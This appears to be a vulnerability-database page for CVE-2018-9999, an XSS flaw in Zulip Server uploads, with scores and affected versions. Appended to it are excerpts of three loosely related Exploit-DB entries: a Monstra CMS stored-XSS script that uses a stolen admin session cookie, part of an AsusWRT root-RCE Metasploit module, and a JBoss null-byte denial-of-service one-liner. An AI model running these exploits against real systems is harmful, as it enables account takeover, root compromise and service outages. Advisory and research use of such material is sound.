CVE-2018-9999
published 2018-04-18CVE-2018-9999: In Zulip Server versions before 1.7.2, there was an XSS issue with user uploads and the (default) LOCAL_UPLOADS_DIR storage backend.
PriorityP423medium5.4CVSS 3.0
AVNACLPRLUIRSCCLILAN
EPSS
0.75%
50.2th percentile
In Zulip Server versions before 1.7.2, there was an XSS issue with user uploads and the (default) LOCAL_UPLOADS_DIR storage backend.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zulip | zulip_server | < 1.7.2 | 1.7.2 |
CVSS provenance
nvdv3.05.4MEDIUMCVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:P/A:N
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)
exploitdb·2018-06-07
CVE-2018-10118 Monstra CMS < 3.0.4 - Cross-Site Scripting (1)
Monstra CMS www.target.com')
url = input('Target : ')
print('[*] Required admin\'s PHPSESSID.')
PHPSESSID = input('PHPSESSID : ')
pagename = input('Pagename : ')
script = input('Script : ')
target = 'http://' + url + '/admin/index.php?id=pages&action=add_page'
cookie = {'PHPSESSID':PHPSESSID}
data = {'csrf':'9c1763649f4e5ce611d29ef5cd10914fa61e91f5',\
'page_title':script,\
'page_name':pagename,\
'page_meta_title':'',\
'page_keywords':'',\
'page_description':'',\
'pages':0,\
'templates':'index',\
'status':'published',\
'access':'public',\
'editor':'',\
'page_tags':'',\
'add_page_and_exit':'Save+and+Exit',\
'page_date':'9999-99-99'}
result = runXSS(target, cookie, data)
print('-' * 69)
if result == 'OK':
print('[+] LINK : http://' + url + '/' + pagename)
else:
print('[-] Error')
Exploit-DB
AsusWRT LAN - Remote Code Execution (Metasploit)
exploitdb·2018-02-26
CVE-2018-6000 AsusWRT LAN - Remote Code Execution (Metasploit)
AsusWRT LAN - Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'AsusWRT LAN Unauthenticated Remote Code Execution',
'Description' => %q{
The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to
perform a POST in certain cases. This can be combined with another vulnerability in
the VPN configuration upload routine that sets NVRAM configuration variables directly
from the POST request to enable a special command mode.
This command mode can then be abused by sending a UDP packet to infosvr, which is running
on port UDP 9999 to directly execute commands as root.
This exploit leverages that to start telnetd in a random
Exploit-DB
JBoss Remoting 6.14.18 - Denial of Service
exploitdb·2018-02-16·CVSS 7.5
CVE-2018-1041 [HIGH] JBoss Remoting 6.14.18 - Denial of Service
JBoss Remoting 6.14.18 - Denial of Service
---
# Exploit Title: Exploit Denial of Service JBoss Remoting (4447/9999)
# Date: 14-02-2018
# Exploit Author: Frank Spierings
# Vendor Homepage:
https://www.redhat.com/en/technologies/jboss-middleware/application-platform/get-started
# Software Link: http://ftp.redhat.com/pub/redhat/jboss/eap/
# Version: JBoss EAP 6.14.18 | Fixed in JBoss EAP 6.14.19
# Tested on: Red Hat Enterprise Linux Server release 7.4 |
# CVE : CVE-2018-1041
This is a very easy Denial of Service exploit. The target only requires 4
null bytes: `\x00\x00\x00\x00`.
The CPU will instantly spike after receiving this payload.
printf "\x00\x00\x00\x00" | nc
`printf "\x00\x00\x00\x00" | nc 127.0.0.1 4447`
No writeups or analysis indexed.
2018-04-18
Published